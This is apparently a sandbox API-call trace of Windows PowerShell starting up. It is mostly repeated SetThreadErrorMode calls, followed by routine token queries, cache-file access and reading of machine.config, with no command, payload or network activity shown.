	[0048.107] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0048.107] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0048.107] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0048.107] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0048.107] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0048.107] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0048.107] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0048.107] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0048.107] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0048.107] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0048.108] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0048.108] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0048.108] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0048.108] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0048.108] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0048.108] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0048.108] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0048.108] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0048.108] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0048.108] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0048.108] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0048.108] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0048.109] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0048.109] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0048.109] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0048.109] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0048.109] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0048.109] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0048.109] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0048.134] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0048.134] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0048.134] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0048.134] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0048.134] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0048.134] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0048.134] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0048.135] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0048.171] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0048.171] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0048.171] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0048.171] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0048.172] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0048.172] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0048.172] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0048.172] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0048.172] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0048.172] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0048.172] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0048.172] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0048.172] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0048.172] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0048.172] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0048.172] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0048.173] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0048.173] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0048.173] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0048.173] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0048.173] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0048.173] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0048.173] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0048.173] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0048.173] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0048.173] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0048.173] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0048.174] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0048.174] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0048.174] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0048.174] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0048.174] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0048.174] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0048.174] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0048.174] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0048.174] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0048.174] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0048.174] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0048.175] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0048.175] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0048.175] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0048.175] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0048.175] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0048.175] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0048.175] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0048.175] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0048.175] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0048.175] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0048.175] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0048.175] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0048.175] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0048.176] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0048.176] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0048.176] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0048.176] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0048.176] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0048.176] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0048.193] CoTaskMemAlloc (cb=0x218) returned 0x1505fbc0a40
	[0048.193] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x1505fbc0a40, nSize=0x10a | out: lpBuffer="\xf8d0\xf893\x7ffb") returned 0x0
	[0048.193] CoTaskMemFree (pv=0x1505fbc0a40) 
	[0048.197] CoTaskMemAlloc (cb=0x20c) returned 0x1505fbc03e0
	[0048.197] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1505fbc03e0 | out: pszPath="C:\\Users\\Nd9E1FYi\\AppData\\Local") returned 0x0
	[0048.198] CoTaskMemFree (pv=0x1505fbc03e0) 
	[0048.199] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local", lpFilePart=0x0) returned 0x1f
	[0048.200] GetCurrentProcess () returned 0xffffffffffffffff
	[0048.200] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x184c18de68 | out: TokenHandle=0x184c18de68*=0x680) returned 1
	[0048.200] GetTokenInformation (in: TokenHandle=0x680, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x184c18df68 | out: TokenInformation=0x0, ReturnLength=0x184c18df68) returned 0
	[0048.200] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1505f48d480
	[0048.200] GetTokenInformation (in: TokenHandle=0x680, TokenInformationClass=0x1, TokenInformation=0x1505f48d480, TokenInformationLength=0x2c, ReturnLength=0x184c18df68 | out: TokenInformation=0x1505f48d480, ReturnLength=0x184c18df68) returned 1
	[0048.200] LocalFree (hMem=0x1505f48d480) returned 0x0
	[0048.202] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x1504765ea40, cbSid=0x184c18df60 | out: pSid=0x1504765ea40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x184c18df60) returned 1
	[0048.204] CreateMutexW (lpMutexAttributes=0x1504765ec00, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000") returned 0x67c
	[0048.218] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x184c18de00*=0x67c, lpdwindex=0x184c18dbd4 | out: lpdwindex=0x184c18dbd4) returned 0x0
	[0048.357] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x184c18d940, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x4d
	[0048.357] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd80) returned 1
	[0048.357] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x184c18de60 | out: lpFileInformation=0x184c18de60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95cbb7af, ftCreationTime.dwHighDateTime=0x1d31d93, ftLastAccessTime.dwLowDateTime=0xc171bbc1, ftLastAccessTime.dwHighDateTime=0x1d31d93, ftLastWriteTime.dwLowDateTime=0xc171bbc1, ftLastWriteTime.dwHighDateTime=0x1d31d93, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0048.358] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd40) returned 1
	[0048.411] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0x184c18d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6a
	[0048.411] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcc0) returned 1
	[0048.411] CreateFileW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x5c0
	[0048.413] GetFileType (hFile=0x5c0) returned 0x1
	[0048.413] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc30) returned 1
	[0048.413] GetFileType (hFile=0x5c0) returned 0x1
	[0048.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x105, lpBuffer=0x184c18c420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", lpFilePart=0x0) returned 0x40
	[0048.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x105, lpBuffer=0x184c18c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", lpFilePart=0x0) returned 0x40
	[0048.531] CoTaskMemAlloc (cb=0x20c) returned 0x1505fbbf2e0
	[0048.532] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1505fbbf2e0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0048.532] CoTaskMemFree (pv=0x1505fbbf2e0) 
	[0048.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x184c18c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0048.574] GetCurrentProcess () returned 0xffffffffffffffff
	[0048.574] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x184c18c728 | out: TokenHandle=0x184c18c728*=0x688) returned 1
	[0048.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x184c18c150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\", lpFilePart=0x0) returned 0x30
	[0048.576] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x184c18c7e0 | out: lpFileInformation=0x184c18c7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fdfbae, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x982bc0b8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x982bc0b8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1
	[0048.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x184c18c160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x45
	[0048.578] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x184c18c7c8 | out: lpFileInformation=0x184c18c7c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fdfbae, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x982bc0b8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x982bc0b8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1
	[0048.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x184c18c160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x45
	[0048.578] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18c640) returned 1
	[0048.578] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x68c
	[0048.578] GetFileType (hFile=0x68c) returned 0x1
	[0048.578] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18c5b0) returned 1
	[0048.578] GetFileType (hFile=0x68c) returned 0x1
	[0048.579] GetFileSize (in: hFile=0x68c, lpFileSizeHigh=0x184c18c718 | out: lpFileSizeHigh=0x184c18c718*=0x0) returned 0x8c8f
	[0048.580] ReadFile (in: hFile=0x68c, lpBuffer=0x150476634d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18c688, lpOverlapped=0x0 | out: lpBuffer=0x150476634d8*, lpNumberOfBytesRead=0x184c18c688*=0x1000, lpOverlapped=0x0) returned 1
	[0048.592] ReadFile (in: hFile=0x68c, lpBuffer=0x150476634d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18c468, lpOverlapped=0x0 | out: lpBuffer=0x150476634d8*, lpNumberOfBytesRead=0x184c18c468*=0x1000, lpOverlapped=0x0) returned 1
	[0048.593] ReadFile (in: hFile=0x68c, lpBuffer=0x150476634d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18c258, lpOverlapped=0x0 | out: lpBuffer=0x150476634d8*, lpNumberOfBytesRead=0x184c18c258*=0x1000, lpOverlapped=0x0) returned 1
	[0048.593] ReadFile (in: hFile=0x68c, lpBuffer=0x150476634d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18c258, lpOverlapped=0x0 | out: lpBuffer=0x150476634d8*, lpNumberOfBytesRead=0x184c18c258*=0x1000, lpOverlapped=0x0) returned 1
	[0048.594] ReadFile (in: hFile=0x68c, lpBuffer=0x150476634d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18c258, lpOverlapped=0x0 | out: lpBuffer=0x150476634d8*, lpNumberOfBytesRead=0x184c18c258*=0x1000, lpOverlapped=0x0) returned 1
	[0048.594] ReadFile (in: hFile=0x68c, lpBuffer=0x150476634d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18c118, lpOverlapped=0x0 | out: lpBuffer=0x150476634d8*, lpNumberOfBytesRead=0x184c18c118*=0x1000, lpOverlapped=0x0) returned 1
	[0048.598] ReadFile (in: hFile=0x68c, lpBuffer=0x150476634d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18c358, lpOverlapped=0x0 | out: lpBuffer=0x150476634d8*, lpNumberOfBytesRead=0x184c18c358*=0x1000, lpOverlapped=0x0) returned 1
	[0048.599] ReadFile (in: hFile=0x68c, lpBuffer=0x150476634d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18c208, lpOverlapped=0x0 | out: lpBuffer=0x150476634d8*, lpNumberOfBytesRead=0x184c18c208*=0x1000, lpOverlapped=0x0) returned 1
	[0048.599] ReadFile (in: hFile=0x68c, lpBuffer=0x150476634d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18c208, lpOverlapped=0x0 | out: lpBuffer=0x150476634d8*, lpNumberOfBytesRead=0x184c18c208*=0xc8f, lpOverlapped=0x0) returned 1
	[0048.599] ReadFile (in: hFile=0x68c, lpBuffer=0x150476634d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18c328, lpOverlapped=0x0 | out: lpBuffer=0x150476634d8*, lpNumberOfBytesRead=0x184c18c328*=0x0, lpOverlapped=0x0) returned 1
	[0048.599] CloseHandle (hObject=0x68c) returned 1
	[0048.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x105, lpBuffer=0x184c18c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", lpFilePart=0x0) returned 0x40
	[0048.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x105, lpBuffer=0x184c18c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", lpFilePart=0x0) returned 0x40
	[0048.600] CoTaskMemAlloc (cb=0x20c) returned 0x1505fbbea60
	[0048.600] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1505fbbea60, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0048.600] CoTaskMemFree (pv=0x1505fbbea60) 
	[0048.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x184c18c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0048.600] GetCurrentProcess () returned 0xffffffffffffffff
	[0048.600] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x184c18c928 | out: TokenHandle=0x184c18c928*=0x68c) returned 1
	[0048.601] GetCurrentProcess () returned 0xffffffffffffffff
	[0048.601] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x184c18c928 | out: TokenHandle=0x184c18c928*=0x690) returned 1
	[0048.601] GetCurrentProcess () returned 0xffffffffffffffff
	[0048.601] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x184c18c728 | out: TokenHandle=0x184c18c728*=0x694) returned 1
	[0048.601] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x184c18c7e0 | out: lpFileInformation=0x184c18c7e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0048.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x105, lpBuffer=0x184c18c160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", lpFilePart=0x0) returned 0x40
	[0048.602] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x184c18c7c8 | out: lpFileInformation=0x184c18c7c8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0048.602] GetCurrentProcess () returned 0xffffffffffffffff
	[0048.602] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x184c18c928 | out: TokenHandle=0x184c18c928*=0x698) returned 1
	[0048.603] GetCurrentProcess () returned 0xffffffffffffffff
	[0048.603] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x184c18c928 | out: TokenHandle=0x184c18c928*=0x69c) returned 1
	[0048.615] GetCurrentProcess () returned 0xffffffffffffffff
	[0048.615] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x184c18c678 | out: TokenHandle=0x184c18c678*=0x6a0) returned 1
	[0048.659] GetCurrentProcess () returned 0xffffffffffffffff
	[0048.659] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x184c18c688 | out: TokenHandle=0x184c18c688*=0x6a4) returned 1
	[0048.712] ReadFile (in: hFile=0x5c0, lpBuffer=0x1504768b280, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18db28, lpOverlapped=0x0 | out: lpBuffer=0x1504768b280*, lpNumberOfBytesRead=0x184c18db28*=0x1000, lpOverlapped=0x0) returned 1
	[0048.725] EtwEventRegister (in: ProviderId=0x1504768f748, EnableCallback=0x1505f5a4aec, CallbackContext=0x0, RegHandle=0x1504768f728 | out: RegHandle=0x1504768f728) returned 0x0
	[0048.736] GetCurrentProcess () returned 0xffffffffffffffff
	[0048.736] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x184c18d4c8 | out: TokenHandle=0x184c18d4c8*=0x6ac) returned 1
	[0048.737] GetCurrentProcess () returned 0xffffffffffffffff
	[0048.737] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x184c18d4d8 | out: TokenHandle=0x184c18d4d8*=0x6b0) returned 1
	[0049.032] ReadFile (in: hFile=0x5c0, lpBuffer=0x150476d2f24, nNumberOfBytesToRead=0x2b, lpNumberOfBytesRead=0x184c18d758, lpOverlapped=0x0 | out: lpBuffer=0x150476d2f24*, lpNumberOfBytesRead=0x184c18d758*=0x2b, lpOverlapped=0x0) returned 1
	[0049.033] ReadFile (in: hFile=0x5c0, lpBuffer=0x1504768b280, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18d7f8, lpOverlapped=0x0 | out: lpBuffer=0x1504768b280*, lpNumberOfBytesRead=0x184c18d7f8*=0x1000, lpOverlapped=0x0) returned 1
